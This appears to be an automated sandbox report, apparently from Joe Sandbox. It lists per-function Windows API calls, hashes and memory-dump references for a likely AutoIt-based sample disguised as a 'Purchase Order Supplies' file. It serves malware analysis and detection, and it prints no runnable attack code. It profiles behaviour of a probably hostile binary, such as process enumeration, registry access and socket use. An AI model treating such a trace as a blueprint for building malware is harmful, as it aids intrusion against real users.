                          • GetWindowLongW.USER32(0136B2C0,000000F0), ref: 00CF8E27
                          • GetWindowLongW.USER32(0136B2C0,000000F0), ref: 00CF8E5C
                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00CF8E8E
                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00CF8EB8
                          • GetWindowLongW.USER32(?,000000F0), ref: 00CF8EC9
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CF8EE3
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: LongWindow$MessageSend
                          • String ID:
                          • API String ID: 2178440468-0
                          • Opcode ID: bc0d881729528c92475a870e24b7051575af797cb992478b12c373ad6978aa54
                          • Instruction ID: 89760535837d54e2cd086cda5f65a75d8641809461180177cc447bc6217bae76
                          • Opcode Fuzzy Hash: bc0d881729528c92475a870e24b7051575af797cb992478b12c373ad6978aa54
                          • Instruction Fuzzy Hash: 98312239600218AFDB608F58DC85FA53BA1EB4A314F1541A4FA25CB3B2CF61AD45DB62
                          Function 00CD16F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD1734
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD175A
                          • SysAllocString.OLEAUT32(00000000), ref: 00CD175D
                          • SysAllocString.OLEAUT32(?), ref: 00CD177B
                          • SysFreeString.OLEAUT32(?), ref: 00CD1784
                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 00CD17A9
                          • SysAllocString.OLEAUT32(?), ref: 00CD17B7
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: 1d0c222e767ad2913d759dd05fe79fa4c2c1c07b56fb728282d2b54353ef7683
                          • Instruction ID: 80fd928945b87b014af2919869f76abef92ce41425a6e8fce25f82b5bbf7b0e5
                          • Opcode Fuzzy Hash: 1d0c222e767ad2913d759dd05fe79fa4c2c1c07b56fb728282d2b54353ef7683
                          • Instruction Fuzzy Hash: 85214F75600219BF9B109BA9DC88CFB73ADEB09360B558126FE15DB360DB74ED418760
                          Function 00CD69F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C931DA
                          • lstrcmpiW.KERNEL32(?,?), ref: 00CD6A2B
                          • _wcscmp.LIBCMT ref: 00CD6A49
                          • MoveFileW.KERNEL32(?,?), ref: 00CD6A62
                            • Part of subcall function 00CD6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00CD6DBA
                            • Part of subcall function 00CD6D6D: GetLastError.KERNEL32 ref: 00CD6DC5
                            • Part of subcall function 00CD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00CD6DD9
                          • _wcscat.LIBCMT ref: 00CD6AA4
                          • SHFileOperationW.SHELL32(?), ref: 00CD6B0C
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                          • String ID: \*.*
                          • API String ID: 2323102230-1173974218
                          • Opcode ID: 258f592e8cada9548dad8a2a2df623ea08a0326fb8b92afc4bc1ff822e997699
                          • Instruction ID: ed6e0e9bc8afcc61e97a74113ceea8b61f26bd51505f413207b832f35f6932c0
                          • Opcode Fuzzy Hash: 258f592e8cada9548dad8a2a2df623ea08a0326fb8b92afc4bc1ff822e997699
                          • Instruction Fuzzy Hash: 6F3134719002186ACF50EFB4D845BDDB7B8AF08300F5445EBE519E3251EB349B89DF64
                          Function 00CD2FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                          • API String ID: 1038674560-2734436370
                          • Opcode ID: ed84cadcf84f2d7a6e3fd5d79b2d241c6f6fdf83c9a1fb2dad29031b049ba7ca
                          • Instruction ID: f68a95437f6dbb24b8102ffeba2da14142726b82668cf6d3f0396cee4a36e8f2
                          • Opcode Fuzzy Hash: ed84cadcf84f2d7a6e3fd5d79b2d241c6f6fdf83c9a1fb2dad29031b049ba7ca
                          • Instruction Fuzzy Hash: 832149721042617AC230F7759C06EFB73E89F75304F144427FA9687291EB91AB82E2A2
                          Function 00CD17C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD180D
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD1833
                          • SysAllocString.OLEAUT32(00000000), ref: 00CD1836
                          • SysAllocString.OLEAUT32 ref: 00CD1857
                          • SysFreeString.OLEAUT32 ref: 00CD1860
                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 00CD187A
                          • SysAllocString.OLEAUT32(?), ref: 00CD1888
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: ce55f2d096a38d93f8241f9a2c16a0395edea0af276b2470d2feac6b9cfca742
                          • Instruction ID: e50c3ad660a7ba932491ae646abfac3b66243138086333b5d605bce2228cf164
                          • Opcode Fuzzy Hash: ce55f2d096a38d93f8241f9a2c16a0395edea0af276b2470d2feac6b9cfca742
                          • Instruction Fuzzy Hash: 76216075600204BF9B10DBE9DC88DAE77ECEB09360B458126FA15DB3A4DB74ED819B60
                          Function 00CFA0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAC657
                            • Part of subcall function 00CAC619: GetStockObject.GDI32(00000011), ref: 00CAC66B
                            • Part of subcall function 00CAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAC675
                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CFA13B
                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CFA148
                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CFA153
                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CFA162
                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CFA16E
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$CreateObjectStockWindow
                          • String ID: Msctls_Progress32
                          • API String ID: 1025951953-3636473452
                          • Opcode ID: bf836a56526e8307868bf9dcebdeacc20b7cea35eb89fb4fbd704c05e37f95ee
                          • Instruction ID: 9a4c7283bf355c60f0a4afe20bce02ee231689f5c208ab2057451b3d604057ed
                          • Opcode Fuzzy Hash: bf836a56526e8307868bf9dcebdeacc20b7cea35eb89fb4fbd704c05e37f95ee
                          • Instruction Fuzzy Hash: 491193B114021DBEEF154F61CC85EEB7F6DEF08798F018115FB08A6090C6729C21DBA0
                          Function 00CB4C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON
                          Download Yara Rule
                          APIs
                          • __getptd_noexit.LIBCMT ref: 00CB4C3E
                            • Part of subcall function 00CB86B5: GetLastError.KERNEL32(?,00CB0127,00CB88A3,00CB4673,?,?,00CB0127,?,00C9125D,00000058,?,?), ref: 00CB86B7
                            • Part of subcall function 00CB86B5: __calloc_crt.LIBCMT ref: 00CB86D8
                            • Part of subcall function 00CB86B5: GetCurrentThreadId.KERNEL32 ref: 00CB8701
                            • Part of subcall function 00CB86B5: SetLastError.KERNEL32(00000000,00CB0127,00CB88A3,00CB4673,?,?,00CB0127,?,00C9125D,00000058,?,?), ref: 00CB8719
                          • CloseHandle.KERNEL32(?,?,00CB4C1D), ref: 00CB4C52
                          • __freeptd.LIBCMT ref: 00CB4C59
                          • RtlExitUserThread.NTDLL(00000000,?,00CB4C1D), ref: 00CB4C61
                          • GetLastError.KERNEL32(?,?,00CB4C1D), ref: 00CB4C91
                          • RtlExitUserThread.NTDLL(00000000,?,?,00CB4C1D), ref: 00CB4C98
                          • __freefls@4.LIBCMT ref: 00CB4CB4
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                          • String ID:
                          • API String ID: 1445074172-0
                          • Opcode ID: 512668113e0f041b776bf6e7e5adae43e0e86b328c904d33b23df65ea417ad9b
                          • Instruction ID: b121d58119c4d264296f2ad7c113bdfda610f0ed8bc989444428f2d2d471e97d
                          • Opcode Fuzzy Hash: 512668113e0f041b776bf6e7e5adae43e0e86b328c904d33b23df65ea417ad9b
                          • Instruction Fuzzy Hash: DB01DF70405701AFD718BBB4D90A9CE7BEAEF04714F108518F929CB253EF34D94ADAA1
                          Function 00CAC697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                          Download Yara Rule
                          APIs
                          • GetClientRect.USER32(?,?), ref: 00CAC6C0
                          • GetWindowRect.USER32(?,?), ref: 00CAC701
                          • ScreenToClient.USER32(?,?), ref: 00CAC729
                          • GetClientRect.USER32(?,?), ref: 00CAC856
                          • GetWindowRect.USER32(?,?), ref: 00CAC86F
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Rect$Client$Window$Screen
                          • String ID:
                          • API String ID: 1296646539-0
                          • Opcode ID: 519d86e82d613f48a681a5921c2de0eb0a7ae781f40b1d042de4e9bc2d57f9c7
                          • Instruction ID: 03f3e7296d742158a31371060c989436222bd88679f8999c2a149616b15f73a8
                          • Opcode Fuzzy Hash: 519d86e82d613f48a681a5921c2de0eb0a7ae781f40b1d042de4e9bc2d57f9c7
                          • Instruction Fuzzy Hash: EAB1607990024ADBDF10CFA9C5807EDBBB1FF09314F149529EC69EB294DB34AA40CB64
                          Function 00CD9569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove$__itow__swprintf
                          • String ID:
                          • API String ID: 3253778849-0
                          • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                          • Instruction ID: bc5055ee097a478437545ac7f6ffd8b71dbb2d63d2412e780cfafb0fbafc843f
                          • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                          • Instruction Fuzzy Hash: 32619D3451020AABCF05EF64CC86EFE37A9EF05308F04455AF95A6B292EB34DD06EB51
                          Function 00CF1AD0 Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00CF1B09
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00CF1B17
                          • __wsplitpath.LIBCMT ref: 00CF1B45
                            • Part of subcall function 00CB297D: __wsplitpath_helper.LIBCMT ref: 00CB29BD
                          • _wcscat.LIBCMT ref: 00CF1B5A
                          • Process32NextW.KERNEL32(00000000,?), ref: 00CF1BD0
                          • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00CF1BE2
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                          • String ID:
                          • API String ID: 1380811348-0
                          • Opcode ID: adc8a4514ea2fa400bda372a57136a8565f2e9124c942ce2aaf42c851fcc8665
                          • Instruction ID: 579775a6fb76ea960eceebc65ddce89308767c1412c0a0c18c4642eba50bc05a
                          • Opcode Fuzzy Hash: adc8a4514ea2fa400bda372a57136a8565f2e9124c942ce2aaf42c851fcc8665
                          • Instruction Fuzzy Hash: B1518E71504305AFC710EF24C885EABB7E8EF89754F04491EF989D7251EB70EA45CBA2
                          Function 00CF2EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                            • Part of subcall function 00CF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2AA6,?,?), ref: 00CF3B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF2FA0
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CF2FE0
                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00CF3003
                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CF302C
                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CF306F
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CF307C
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                          • String ID:
                          • API String ID: 4046560759-0
                          • Opcode ID: 7b64f2fdcff589ba6b73c854aa5318854dfc42939dabb6a89e14ff117aea595e
                          • Instruction ID: 05c4783e2db766116c309472a773cb091a991e5c77c0b48deda4b258e892b447
                          • Opcode Fuzzy Hash: 7b64f2fdcff589ba6b73c854aa5318854dfc42939dabb6a89e14ff117aea595e
                          • Instruction Fuzzy Hash: A4514931218205AFCB04EF64C885E6EBBF9FF88304F04491EF656972A1DB71EA05DB52
                          Function 00CADB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _wcscpy$_wcscat
                          • String ID:
                          • API String ID: 2037614760-0
                          • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                          • Instruction ID: 30df9e30fce4a65eb3d508503e925a1a742dd765144de7d05e221fdb05f45877
                          • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                          • Instruction Fuzzy Hash: BF51E230900216ABCB21AF99D4419FDB7B0EF06728F94404AF593AB691DB745F82E7A4
                          Function 00CD2ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00CD2AF6
                          • VariantClear.OLEAUT32(00000013), ref: 00CD2B68
                          • VariantClear.OLEAUT32(00000000), ref: 00CD2BC3
                          • _memmove.LIBCMT ref: 00CD2BED
                          • VariantClear.OLEAUT32(?), ref: 00CD2C3A
                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00CD2C68
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Variant$Clear$ChangeInitType_memmove
                          • String ID:
                          • API String ID: 1101466143-0
                          • Opcode ID: 724fd2e1d3ad27ba2529000fc5b21462f92193b5952707d48e4fb342a1537482
                          • Instruction ID: 2b0d3890baa7d3d914d709ca59b8e616b3d39dc178c1ab757ba888c7741f876c
                          • Opcode Fuzzy Hash: 724fd2e1d3ad27ba2529000fc5b21462f92193b5952707d48e4fb342a1537482
                          • Instruction Fuzzy Hash: 1A517CB5A00209EFDB14CF58C880AAAB7F9FF9C314B15855AEA59DB310D730E951CFA0
                          Function 00CF82DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenu.USER32(?), ref: 00CF833D
                          • GetMenuItemCount.USER32(00000000), ref: 00CF8374
                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CF839C
                          • GetMenuItemID.USER32(?,?), ref: 00CF840B
                          • GetSubMenu.USER32(?,?), ref: 00CF8419
                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00CF846A
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Menu$Item$CountMessagePostString
                          • String ID:
                          • API String ID: 650687236-0
                          • Opcode ID: 06641996c810d68668215f672c68f2165a681aa6cdb663c0f45152ee589ac419
                          • Instruction ID: 0da94eb0ae486b6cd525dd184e3a92959c824b86277fb691d9dd9dd5097f9e3a
                          • Opcode Fuzzy Hash: 06641996c810d68668215f672c68f2165a681aa6cdb663c0f45152ee589ac419
                          • Instruction Fuzzy Hash: A951AE71E0021AAFCF01DFA4C855AEEBBF5EF48710F158459EA11BB361CB30AE459B91
                          Function 00CE936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                          Download Yara Rule
                          APIs
                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00CE9409
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE9416
                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00CE943A
                          • _strlen.LIBCMT ref: 00CE9484
                          • _memmove.LIBCMT ref: 00CE94CA
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE94F7
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
